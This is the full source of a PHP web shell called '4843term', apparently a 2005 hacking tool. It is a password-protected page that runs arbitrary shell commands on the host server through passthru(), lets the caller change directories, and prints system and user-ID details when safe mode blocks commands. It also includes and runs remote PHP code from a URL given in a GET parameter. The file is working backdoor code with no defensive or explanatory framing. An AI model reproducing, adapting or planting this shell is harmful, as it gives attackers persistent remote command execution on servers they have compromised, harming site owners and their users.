Untitled

<?php

  $md5pass   = "946cf47f56ba86bf80208715f3aa1921";

  $password  = $_POST["password"];
  $command   = $_POST["command"];
  $changedir = $_POST["changedir"];
  $remotephp = $_GET["remotephp"];

  if (empty($password)) $password = $_GET["password"];

  if (!empty($password)) { if (md5($password) != $md5pass) $password = ""; }
  else $password = "";
  if (!isset($changedir) || empty($password)) {
    @ $changedir = exec("pwd");
  } else {
    @ chdir("$changedir");
    @ $changedir = exec("pwd");
    if (empty($changedir)) { $changedir = "/"; }
  }
  if (!empty($command) && !empty($password)) {
    $command = stripslashes($command);
    $temp = explode(" ", $command);
    if ($temp[0] == "cd") {
      $temp = explode(";", $command);
      $changedir = exec("$temp[0]; pwd");
      if (empty($changedir)) { $changedir = "/"; }
      $command = "";
      if (isset($temp[1])) {
        $command = $temp[1];
        for ($loop = 2; isset($temp[$loop]); $loop++) { $command .= "; $temp[$loop]"; }
      }
    }
  }

?>
<html>
  <head>
    <title>4843term</title>
  </head>
  <body bcolor="#FFFFFF" text="#000000">
    <font face="Fixedsys">
    <table width="100%" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td align="left" valign="top">
          <form method="post" name="terminal" action="<?php echo $PHP_SELF; ?>" target="_self">
<?php if (empty($password)) { echo "            Password:<br>\n"; } ?>
            <input type="<?php if (!empty($password)) { echo "hidden"; } else { echo "password"; } ?>" name="password" size="50"<?php if (!empty($password)) echo " value=\"$password\""; ?>><?php if (empty($password)) { echo "<br><br>\n"; } ?>
            Directory:<br>
            <input type="text" name="changedir" size="50"<?php if (isset($changedir)) echo " value=\"$changedir\""; ?>><br><br>
            Command:<br>
            <input type="text" name="command" size="50">
            <input type="submit" value="Execute"><br>
            <input type="checkbox" name="stderr"<?php if (isset($stderr) || !isset($command)) echo " checked"; ?>> Enable stderr-trappin
          </form>
        </td>
        <td align="left" valign="center">
<pre>
4843term by Havenard
  Version 1.050501 [01/May/2005]

Contact : havenard@hotmail.com
    IRC : irc.brasnet.org

    01010000 01001110 01010111
</pre>
        </td>
      </tr>
    </table>
    <br>
<pre>
<?php
  if (md5($password) == $md5pass) {
    @ chdir("$changedir");

    $safe_mode = (bool)ini_get("safe_mode");

    if (!$safe_mode) {
      if (!empty($command)) {
        ob_start();
        if (!isset($OS) || ($OS != "Windows_NT"))
          @passthru("$command 2>&1");
        else
          @passthru("$command");
        $output = ob_get_contents();
        ob_end_clean();
        if (!empty($output))
          echo str_replace(">", ">", str_replace("<", "<", $output));
      }
    }
    else {
      echo "Due to SafeMode, it's unable to execute commands!\n";

      echo "Machine informations:\n";
      echo "PHP: ".phpversion()."\n";
      echo "Server: $SERVER_SOFTWARE $SERVER_VERSION\n";
      $uname = @posix_uname();
      if (!empty($uname)) {
        while (list($info, $value) = each($uname))
          echo "$value ";
        echo "\n";
      }
      $uids  = @posix_getlogin();
      $euids = @posix_getlogin();
      $uid   = @posix_getuid();
      $euid  = @posix_geteuid();
      $gid   = @posix_getgid();
      if (!empty($uid))
        echo "User: uid=$uids($uid) euid=$euid($euid) gid=$gid($gid)\n";
    }

    if (!empty($remotephp)) include($remotephp);
  }

?>

</pre>
    <script> document.terminal.command.focus(); </script>
  </body>
</html>